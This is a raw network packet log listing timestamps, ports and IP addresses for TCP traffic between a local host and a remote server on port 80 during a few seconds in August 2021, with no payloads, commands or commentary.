Aug 24, 2021 08:46:50.773494005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773505926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773521900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773554087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773567915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773581982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773608923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773637056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773652077 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773662090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773686886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773696899 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773716927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773730993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773745060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773767948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773787022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773818970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773848057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773853064 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773875952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773900986 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773902893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773930073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773946047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.773956060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.773983002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.774008036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.774012089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.774044037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.774072886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.774076939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.774100065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.774116993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.774127007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.774171114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.797962904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798007965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798034906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798063040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798086882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798115969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798144102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798170090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798194885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798217058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798222065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798257113 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798291922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798438072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798506975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798537970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798566103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798593044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798593998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798619986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798640966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798645973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798672915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798688889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798701048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798716068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798732042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798762083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798779011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798789024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798815012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798840046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798866987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798891068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798892975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798904896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798918962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798943043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.798950911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.798979998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.799005985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.799015045 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.799032927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.799057961 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.799060106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.799086094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.799112082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.799128056 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.799154043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.799176931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.799186945 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.799230099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.821800947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.821830988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.821846962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.821863890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.821880102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.821897030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.821912050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.821930885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.821942091 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.821948051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.821965933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822032928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.822694063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822726011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822809935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822825909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822844982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822863102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822877884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822880983 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.822896004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822912931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822923899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822937012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822952032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822953939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.822968960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822981119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.822988033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.822997093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823012114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823015928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.823041916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823065042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823065042 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.823084116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.823087931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823107004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823142052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823164940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823189974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823193073 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.823214054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823266029 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.823282003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823332071 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.823616028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.823760033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.846834898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.846862078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.846877098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.846894979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.846911907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.846929073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.846946001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.846965075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.846982956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847003937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847021103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847024918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847043991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847062111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847078085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847095966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847136021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847136974 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847162962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847170115 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847188950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847198963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847208977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847227097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847234964 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847246885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847266912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847274065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847289085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847306013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847326994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847336054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847348928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847368002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847387075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847394943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847407103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847424030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847440004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847445965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847465992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847470045 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847490072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847508907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847524881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847542048 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847608089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.847675085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.847848892 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.871018887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.871062040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.871087074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.871110916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.871150970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.871176004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.871200085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.871217966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:50.871241093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:50.871326923 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:51.660223007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:51.660258055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:51.682358980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:51.707551956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:51.764868975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:51.766654968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:51.766707897 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:51.793206930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:51.817249060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:51.855606079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:51.855725050 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:51.877759933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:51.900288105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:51.970057011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:51.970242977 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:51.992258072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.015989065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.062522888 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.062613964 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.092757940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.107935905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.127388000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.127470970 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.149524927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.172163963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.220546007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.220707893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.242693901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.266251087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.313436985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.313556910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.337187052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.360768080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.437999010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.438173056 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.461396933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.485865116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.499870062 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.499907017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.522185087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.547749043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.592437983 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.592573881 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.615925074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.640243053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.694292068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.694474936 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.717401028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780133963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780159950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780280113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780296087 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.780302048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780319929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780335903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780352116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780368090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780376911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.780384064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780396938 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.780400991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.780450106 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.780518055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.802535057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802566051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802587986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802604914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802623034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802649975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802656889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.802671909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802685022 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.802690029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802706957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802720070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802733898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802747011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.802752018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802768946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802772045 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.802786112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802803040 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.802805901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802824974 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.802825928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802843094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802859068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802871943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.802876949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802892923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.802916050 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.802937031 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826232910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826297045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826338053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826396942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826441050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826461077 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826486111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826488972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826508999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826528072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826546907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826548100 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826565981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826585054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826602936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826607943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826622963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826646090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826647043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826667070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826683044 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826687098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826705933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826718092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826725006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826744080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826752901 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826761961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826780081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826790094 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826802969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826822996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826826096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826841116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826859951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826862097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826879025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826895952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826915026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826920033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826932907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826955080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826976061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.826977015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.826993942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.827013969 CEST	49715	80	192.168.2.7	212.224.105.79
